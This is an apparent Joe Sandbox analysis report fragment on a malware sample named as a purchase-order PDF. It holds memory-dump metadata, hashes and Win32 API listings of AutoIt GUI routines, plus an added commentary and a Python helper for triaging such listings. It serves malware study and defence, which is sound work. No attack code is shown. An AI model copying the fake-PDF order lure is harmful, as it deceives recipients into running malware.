                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: NameUser
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2645101109-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                                                                                                                                                                                                                                                            • Instruction ID: 8011c19b6c32d183c263453b2018abc548473ce9ed5616c99acac4896e71f792
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F6E08C322083058FC310EF55F8405ABB390EB94311F004C3FE64AA2191DA79920EDFAB
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00021FEC), ref: 00422033
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                                                                                                                                                                                                                                                            • Instruction ID: 3275b40964251646410af8875a24301f93fa315c26af6adae0ca3d0f7a721f84
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD9002743511144A4A011BB16E5D90925D46A586067920875B411C4064DB9840019619
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                            • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                                                                                                                                                                                            • Instruction ID: b3f199f19983f506b623bfe7955a95149e6efe4e98ce3416cc40fa12ddcf4508
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46D19073C0A9B30A8735812D42582BFEE626FD578131EC3E29CD07F38AD26B5DA195D4
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                            • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                                                                                                                                                                                                            • Instruction ID: c47bdb3f9c9e38c5d46ddb9e43dedaf70276048770aeb58bd274f21c588a824b
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1CD19073D1A9B30A8735852D42581AFEE626FD578031EC3E2CCD07F38AD16B5DA191D4
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                            • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                                                                                                                                                                                                            • Instruction ID: ac15b8da1a4b082d71a0b082c8349c97121379a14580263daf363e6ab8f75410
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 87C18173C0A9B30A8736812D42641AFEE626FD579031FC3E2CCD47F38A91AB5DA195D4
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Memory Dump Source
• Source File: 00000000.00000002.2078097907.000000000553B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0553B000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_553b000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Memory Dump Source
• Source File: 00000000.00000002.2078097907.000000000553B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0553B000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_553b000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Memory Dump Source
• Source File: 00000000.00000002.2078097907.000000000553B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0553B000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_553b000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Memory Dump Source
• Source File: 00000000.00000002.2078097907.000000000553B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0553B000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_553b000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
APIs
• DeleteObject.GDI32(?), ref: 004593D7
• DeleteObject.GDI32(?), ref: 004593F1
• DestroyWindow.USER32(?), ref: 00459407
• GetDesktopWindow.USER32 ref: 0045942A
• GetWindowRect.USER32(00000000), ref: 00459431
• SetRect.USER32(50000001,00000000,00000000,000001F4,?), ref: 00459568
• AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00459577
• CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,?,?,50000001,?,?,00000000,00000000), ref: 004595BB
• GetClientRect.USER32(00000000,?), ref: 004595C8
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00459615
• CreateFileW.KERNEL32(00000000,?,80000000,00000000,00000000,00000003,00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459635
• GetFileSize.KERNEL32(00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459654
• GlobalAlloc.KERNEL32(00000002,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 0045965F
• GlobalLock.KERNEL32(00000000), ref: 00459668
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459678
• GlobalUnlock.KERNEL32(00000000), ref: 0045967F
• CloseHandle.KERNEL32(00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459686
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,50000001,?,?,00000000,00000000,00000000), ref: 00459694
• OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,000001F4), ref: 004596AD
                                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 004596C0
                                                                                                                                                                                                                                                                                                            • CopyImage.USER32(000000FF,00000000,00000000,00000000,00002000), ref: 004596EF
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000172,00000000,000000FF), ref: 00459712
                                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,50000001,?,?,00000000,00000000,00000000), ref: 0045973D
                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000004,?,50000001,?,?,00000000,00000000,00000000), ref: 0045974B
                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,static,00000000,?,?,0000000B,0000000B,?,?,?,00000000,00000000), ref: 0045979C
                                                                                                                                                                                                                                                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004597AD
                                                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 004597B7
                                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004597BF
                                                                                                                                                                                                                                                                                                            • GetTextFaceW.GDI32(00000000,00000040,00000190,?,50000001,?,?,00000000,00000000,00000000), ref: 004597CD
                                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004597D6
                                                                                                                                                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 004597E1
                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00459800
                                                                                                                                                                                                                                                                                                            • _wcscpy.LIBCMT ref: 0045981F
                                                                                                                                                                                                                                                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 004598BB
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004598D0
                                                                                                                                                                                                                                                                                                            • GetDC.USER32(?), ref: 004598DE
                                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 004598EE
                                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00459919
                                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00459925
                                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,0000000B,?,?,?,00000001), ref: 00459943
                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 00459951
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                                                                                            • API String ID: 4040870279-2373415609
                                                                                                                                                                                                                                                                                                            • Opcode ID: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                                                                                                                                                                                                                                                            • Instruction ID: fce7466cc8f2b4b34a2e278d60cb4f704f90ff1017bfb666dbfc83d8aba9d67a
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F028C70204301EFD714DF64DE89F2BB7A8AB84705F104A2DFA45AB2D2D7B4E805CB69
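The call sequence listed for the routine above (CreateWindowExW on the "static" class with style 5000000E, CreateFileW with access 80000000 and disposition 00000003, ReadFile into a GlobalAlloc block, CreateStreamOnHGlobal, OleLoadPicture, CopyImage, then SendMessageW with message 00000172) is the standard Win32 way to display an image file in a static control, and the routine's String ID carries "AutoIt v3". That marks this block as GUI scaffolding of the AutoIt runtime compiled into the sample rather than the stealer logic the report flags elsewhere, which is the kind of distinction a triager has to make across hundreds of such blocks. The helper below is an added example (my own code, not Joe Sandbox's, AutoIt's or the sample's) that parses listing lines in the format above, decodes the window style and the CreateFileW/STM_SETIMAGE constants, and reports whether the block matches the file-to-picture-control pattern. The input lines are copied from the listing above; the record and function names are my own.

```python
"""Parse a Joe Sandbox 'APIs' call listing and decode the picture-control pattern.

Added triage helper (not Joe Sandbox, AutoIt or sample code). Input lines are
copied from the report's listing for the routine around 0x4595C8.
"""
import re
from dataclasses import dataclass

SAMPLE_LISTING = """\
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00459615
• CreateFileW.KERNEL32(00000000,?,80000000,00000000,00000000,00000003,00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459635
• GetFileSize.KERNEL32(00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459654
• GlobalAlloc.KERNEL32(00000002,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 0045965F
• GlobalLock.KERNEL32(00000000), ref: 00459668
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459678
• GlobalUnlock.KERNEL32(00000000), ref: 0045967F
• CloseHandle.KERNEL32(00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459686
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,50000001,?,?,00000000,00000000,00000000), ref: 00459694
• OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,000001F4), ref: 004596AD
• GlobalFree.KERNEL32(00000000), ref: 004596C0
• CopyImage.USER32(000000FF,00000000,00000000,00000000,00002000), ref: 004596EF
• SendMessageW.USER32(00000000,00000172,00000000,000000FF), ref: 00459712
• _wcslen.LIBCMT ref: 00459800
"""

# Win32 constants used by the decoders (values as in the Windows SDK headers).
WS_CHILD, WS_VISIBLE = 0x40000000, 0x10000000
SS_TYPEMASK, SS_BITMAP = 0x0000001F, 0x0000000E
STM_SETIMAGE, IMAGE_BITMAP = 0x0172, 0
GENERIC_READ, OPEN_EXISTING = 0x80000000, 3


@dataclass(frozen=True)
class Call:
    api: str
    module: str
    args: tuple  # ints for 8-hex-digit words, '?' for unknown, other strings as-is
    ref: int     # call-site address from "ref:"


# "API.MODULE(args), ref: ADDR", or for CRT entries "_wcslen.LIBCMT ref: ADDR".
_CALL_RE = re.compile(
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)


def _word(tok: str):
    tok = tok.strip()
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else tok


def parse_calls(listing: str) -> list[Call]:
    """Turn listing lines into Call records; lines that carry no call are skipped."""
    calls = []
    for line in listing.splitlines():
        m = _CALL_RE.search(line)
        if not m:
            continue
        raw = m.group("args")
        args = tuple(_word(t) for t in raw.split(",")) if raw else ()
        calls.append(Call(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def decode_static_style(style: int) -> list[str]:
    """Name the style bits of a CreateWindowExW call on the 'static' class."""
    names = [n for n, bit in (("WS_CHILD", WS_CHILD), ("WS_VISIBLE", WS_VISIBLE)) if style & bit]
    if style & SS_TYPEMASK == SS_BITMAP:
        names.append("SS_BITMAP")
    return names


def classify_image_load(calls: list[Call]) -> dict:
    """Collect evidence that a file was read and pushed into a static control as a bitmap.

    Caveat: the argument lists in these listings are stack snapshots, so they often
    run past the API's real parameter count (after CreateFileW's seven parameters the
    trailing ?,50000001,... words are caller-frame residue). Only leading words are used.
    """
    ev = {}
    for c in calls:
        a = c.args
        if c.api == "CreateWindowExW" and len(a) > 3 and a[1] == "static" and isinstance(a[3], int):
            ev["static_control_style"] = decode_static_style(a[3])
        elif c.api == "CreateFileW" and len(a) > 5 and a[2] == GENERIC_READ and a[5] == OPEN_EXISTING:
            ev["CreateFileW_read"] = c.ref
        elif c.api in ("ReadFile", "CreateStreamOnHGlobal", "OleLoadPicture"):
            ev[c.api] = c.ref
        elif c.api == "SendMessageW" and len(a) > 2 and a[1] == STM_SETIMAGE and a[2] == IMAGE_BITMAP:
            ev["STM_SETIMAGE"] = c.ref
    chain = ("CreateFileW_read", "ReadFile", "CreateStreamOnHGlobal", "OleLoadPicture", "STM_SETIMAGE")
    refs = [ev.get(k) for k in chain]
    # The chain must be complete and its call sites must appear in program order.
    ev["is_picture_control_load"] = all(r is not None for r in refs) and refs == sorted(refs)
    return ev


if __name__ == "__main__":
    parsed = parse_calls(SAMPLE_LISTING)
    for call in parsed:
        print(f"{call.ref:08X} {call.module}!{call.api}")
    print(classify_image_load(parsed))
```

Run it over a whole block by pasting the block's API lines into SAMPLE_LISTING. Blocks that decode as a complete picture-control chain can be set aside as runtime GUI code; the ones worth reading are those where the same file-read primitives feed something other than OleLoadPicture and a static control.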
APIs
• GetSysColor.USER32(0000000E), ref: 00433D81
• SetTextColor.GDI32(?,00000000), ref: 00433D89
• GetSysColor.USER32(00000012), ref: 00433DA3
• SetTextColor.GDI32(?,?), ref: 00433DAB
• GetSysColorBrush.USER32(0000000F), ref: 00433DBF
• GetSysColor.USER32(0000000F), ref: 00433DCB
• CreateSolidBrush.GDI32(?), ref: 00433DD4
• GetSysColor.USER32(00000011), ref: 00433DEB
• CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
• SelectObject.GDI32(?,00000000), ref: 00433E0D
• SetBkColor.GDI32(?,?), ref: 00433E19
• SelectObject.GDI32(?,?), ref: 00433E29
• InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
• RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
• GetWindowLongW.USER32 ref: 00433E8A
• SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
• GetWindowTextW.USER32(00000000,00000000,00000105), ref: 00433EE1
• InflateRect.USER32(?,000000FD,000000FD), ref: 00433F13
• DrawFocusRect.USER32(?,?), ref: 00433F1F
• GetSysColor.USER32(00000011), ref: 00433F2E
• SetTextColor.GDI32(?,00000000), ref: 00433F36
• DrawTextW.USER32(?,?,000000FF,?,?), ref: 00433F4E
• SelectObject.GDI32(?,?), ref: 00433F63
• DeleteObject.GDI32(?), ref: 00433F70
• SelectObject.GDI32(?,?), ref: 00433F78
• DeleteObject.GDI32(00000000), ref: 00433F7B
• SetTextColor.GDI32(?,?), ref: 00433F83
• SetBkColor.GDI32(?,?), ref: 00433F8F
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
